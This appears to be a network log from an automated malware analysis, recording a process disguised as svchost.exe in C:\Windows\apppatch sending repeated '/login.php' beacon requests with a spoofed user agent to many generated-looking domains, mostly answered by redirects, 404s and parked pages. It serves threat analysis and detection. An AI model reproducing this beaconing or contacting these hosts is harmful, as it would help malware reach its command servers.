                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NEX3SagEc2c8j5reoH1uxYKBo8o4IJWCHafAXOonXR54%2F8jbaMQtCoWGQxPDBGocVhoTl42%2BcmztUrL8ZS3kM2nN9Mpb57s1LcaCci1d2JHi5p9DmhxtY6byqI606g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb514aa354334-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.635484934 CEST | 173 | IN | Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.412163019 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.757667065 CEST | 793 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:20 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V80gHJfUyR3OQzy%2FL5dMt65AI7wOr2Qt2peTmQk7YGG8L880YIzQkaWcFAkaC%2BCq7jatJ6jN13WHPOvCSw7Jl6IT3xuFald%2FWPVfZkXLY%2BQMv1pgN6NhsBeQ21EvMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb522ebb64334-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                          19 | 192.168.2.9 | 49744 | 18.208.156.248 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.917186975 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupycag.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.390430927 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:18 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=824f072929c3d77bd74be3e0de16fc8b|8.46.123.33|1725785598|1725785598|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                          20 | 192.168.2.9 | 49745 | 103.150.11.230 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.301660061 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:19.674420118 CEST | 403 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:19 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.714858055 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.240425110 CEST | 403 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                          21 | 192.168.2.9 | 49747 | 106.15.36.143 | 8001 | 1512 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                          Sep 8, 2024 10:53:19.687880993 CEST | 289 | OUT | GET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.713579893 CEST | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:26 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.241411924 CEST | 289 | OUT | GET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.777810097 CEST | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                          22 | 192.168.2.9 | 49750 | 64.225.91.73 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136703968 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galynuh.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.727364063 CEST | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:28 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 593
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"
                                                                                                                                                                                                          accept-ranges: bytes
Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 49751 | 154.85.183.50 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:28.252382994 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Sep 8, 2024 10:53:29.136063099 CEST | 307 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 08 Sep 2024 08:53:28 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Sep 8, 2024 10:53:29.137320995 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Sep 8, 2024 10:53:29.450045109 CEST | 307 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 08 Sep 2024 08:53:29 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 49752 | 44.221.84.105 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:28.294235945 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyciz.com
Sep 8, 2024 10:53:28.777215958 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 08:53:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7426bc2ae984edc036ea6201ba3d56ce|8.46.123.33|1725785608|1725785608|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 60798 | 103.224.212.108 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:29.867739916 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyxynyx.com
Sep 8, 2024 10:53:33.475028038 CEST | 340 | IN | HTTP/1.1 302 Found
date: Sun, 08 Sep 2024 08:53:33 GMT
server: Apache
set-cookie: __tad=1725785613.7387215; expires=Wed, 06-Sep-2034 08:53:33 GMT; Max-Age=315360000
location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 60799 | 15.197.240.20 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:33.744252920 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexyhuv.com
Sep 8, 2024 10:53:34.223045111 CEST | 259 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Sun, 08 Sep 2024 08:53:34 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 60800 | 103.224.182.252 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:34.101811886 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofycot.com
Sep 8, 2024 10:53:35.033274889 CEST | 338 | IN | HTTP/1.1 302 Found
date: Sun, 08 Sep 2024 08:53:34 GMT
server: Apache
set-cookie: __tad=1725785614.8678415; expires=Wed, 06-Sep-2034 08:53:34 GMT; Max-Age=315360000
location: http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 60801 | 199.59.243.226 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:34.878065109 CEST | 350 | OUT | GET /login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1 HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww25.lyxynyx.com
Connection: Keep-Alive
Cookie: __tad=1725785613.7387215
Sep 8, 2024 10:53:35.331448078 CEST | 1236 | IN | HTTP/1.1 200 OK
date: Sun, 08 Sep 2024 08:53:34 GMT
content-type: text/html; charset=utf-8
content-length: 1226
x-request-id: 40f3fec2-0992-4161-9636-aead2e49500b
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_g0eIVdEUnqWp5pH48oaDcfV46IfEX7NQPUpqyOA1HqVj7ENDagOoCO2FFwn38SE1vJzTgZ06FrKeaQ//UpI+yw==
set-cookie: parking_session=40f3fec2-0992-4161-9636-aead2e49500b; expires=Sun, 08 Sep 2024 09:08:35 GMT; path=/


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.9  60802        64.190.63.136   80                1512  C:\Windows\apppatch\svchost.exe

Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 10:53:37.306317091 CEST  348                OUT        GET /login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1725785614.8678415
Sep 8, 2024 10:53:37.983392000 CEST  1236               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:37 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w/CMnnGhcYRuvKXQlgUrjaXKeX1PXOO5vNfb+q8abW4Ilc0j5iHxcFs+NfNpLOwE+ExAs9/vH/D0I9E1zSjetg==
                                                                                                                                                                                                          last-modified: Sun, 08 Sep 2024 08:53:37 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7768d5b45d-sb6gc
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w/CMnnGhcYRuvKXQlgUrjaXKeX1PXOO5vNfb+q8abW4Ilc0j5iHxcFs+NfNpLOwE+ExAs9/vH/D0I9E1zSjetg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
Sep 8, 2024 10:53:37.983412027 CEST  1236               IN
Data Ascii: t source for all of the information you’re looking for. From general topics to more of what you would expect to find here, vofycot.com 576has it all. We hope you find what you are searching for!"><link rel="icon" type="im


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.9  63307        64.225.91.73    80                1512  C:\Windows\apppatch\svchost.exe

Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 10:53:38.673578024 CEST  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qetyhyg.com
Sep 8, 2024 10:53:39.253474951 CEST  816                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:39 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 593
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.9  63308        72.52.179.174   80                1512  C:\Windows\apppatch\svchost.exe

Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 10:53:38.990981102 CEST  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.9  63309        72.52.179.174   80                1512  C:\Windows\apppatch\svchost.exe

Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 10:53:39.522095919 CEST  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


Session ID  Source IP    Source Port  Destination IP  Destination Port
33          192.168.2.9  63310        52.34.198.229   80

Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 10:53:45.168303013 CEST  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lygyvuj.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.922024012 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:45 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=71b686a014dcaa81f183649cefd9ae02|8.46.123.33|1725785625|1725785625|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.9 | 63311 | 44.221.84.105 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:49.527384043 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyhiz.com
Sep 8, 2024 10:53:49.707879066 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 08:53:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3f3c1b31aa98ee6068ede01a84152478|8.46.123.33|1725785629|1725785629|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.9 | 57334 | 69.162.80.55 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.268870115 CEST | 293 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyfyj.com
Cookie: sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795
Sep 8, 2024 10:53:52.790457964 CEST | 772 | IN | HTTP/1.1 200 OK
accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
cache-control: max-age=0, private, must-revalidate
connection: close
content-length: 481
content-type: text/html; charset=utf-8
date: Sun, 08 Sep 2024 08:53:52 GMT
server: nginx
                                                                                                                                                                                                          Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc5MjgzMiwiaWF0IjoxNzI1Nzg1NjMyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqaG90ZDgwOTQxZ2JhaDQxZGl0ZTkiLCJuYmYiOjE3MjU3ODU2MzIsInRzIjoxNzI1Nzg1NjMyNzI4MzYwfQ.LG1EzBfX1ECbJXMCgcf9aj9iS9_3pAa-hmXKPDIsKPc&sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.9 | 57335 | 199.191.50.83 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
